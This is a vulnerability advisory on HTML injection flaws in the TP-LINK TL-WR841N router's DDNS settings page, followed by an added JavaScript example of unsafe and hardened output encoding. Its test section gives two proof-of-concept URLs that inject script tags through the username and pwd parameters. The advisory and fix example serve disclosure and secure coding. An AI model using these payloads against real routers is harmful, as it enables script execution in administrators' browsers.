Multiple HTML injection vulnerabilities in TP-LINK TL-WR841N Routers
Release date:
Updated on:
Affected Systems:
TP-LINK TL-WR841N 3.13.9 Build 120201 Rel.54965n
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56602
TP-LINK TL-WR841N is a wireless router.
TP-LINK TL-WR841N 3.13.9 Build 120201 Rel.54965n and other versions contain multiple HTML injection vulnerabilities that attackers can exploit to execute arbitrary script code in the browser of a user of the affected site.
<* Source: Matan Azugi *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
http://www.example.com/userRpm/NoipDdnsRpm.htm?provider=3&username=a1234</script><script>alert(1)</script>12aaa34f5be&pwd=password&cliUrl=&Save=Save
http://www.example.com/userRpm/NoipDdnsRpm.htm?provider=3&username=1234&pwd=a1234</script><script>alert(1)</script>12aaa34f5be&cliUrl=&Save=Save
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
TP-LINK
-------
The vendor has not currently provided a patch or upgrade. Users of the affected software should watch the vendor's homepage for the latest version:
http://www.tp-link.com/products/
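
The following is an added example, not code from the advisory or from TP-LINK's firmware. It shows why a value like the one in the test URLs escapes a quoted string inside an inline script block, and an output encoding that contains it. It assumes (the advisory does not say so) that the username and pwd values are written back into an inline script block as string literals; all function names are hypothetical.

```javascript
// Added example: assumes the saved DDNS fields are reflected into an inline
// <script> block as string literals. All names here are hypothetical.

// Vulnerable pattern: the value is only wrapped in quotes. The HTML parser
// ends the script element at the first "</script>" it sees, before any
// JavaScript parsing happens, so quoting alone does not contain the value.
function renderUnsafe(username, pwd) {
  return '<script>var ddns = ["' + username + '", "' + pwd + '"];</script>';
}

// Hardened: JSON.stringify handles quotes, backslashes and control characters;
// the extra replacements remove every character the HTML parser could act on
// inside a script element (<, >, &) plus the U+2028/U+2029 line separators.
function jsStringForInlineScript(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderSafe(username, pwd) {
  return '<script>var ddns = [' + jsStringForInlineScript(username) + ', ' +
    jsStringForInlineScript(pwd) + '];</script>';
}

// Counts the script elements an HTML parser would open in the markup.
function countScriptOpens(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Constructed input mirroring the marker used in the advisory's test URLs.
const sample = 'a1234</script><script>alert(1)</script>12aaa34f5be';

function demo() {
  const unsafe = renderUnsafe(sample, 'password');
  const safe = renderSafe(sample, 'password');
  // Round trip: evaluating the escaped literal yields the original string.
  const literal = jsStringForInlineScript(sample);
  return {
    unsafeScriptOpens: countScriptOpens(unsafe), // injected element present
    safeScriptOpens: countScriptOpens(safe),     // only the page's own element
    roundTrip: JSON.parse(literal) === sample,
  };
}
```

The escaped literal still evaluates to the original string in JavaScript, so stored values are displayed unchanged while the HTML parser never sees a tag boundary.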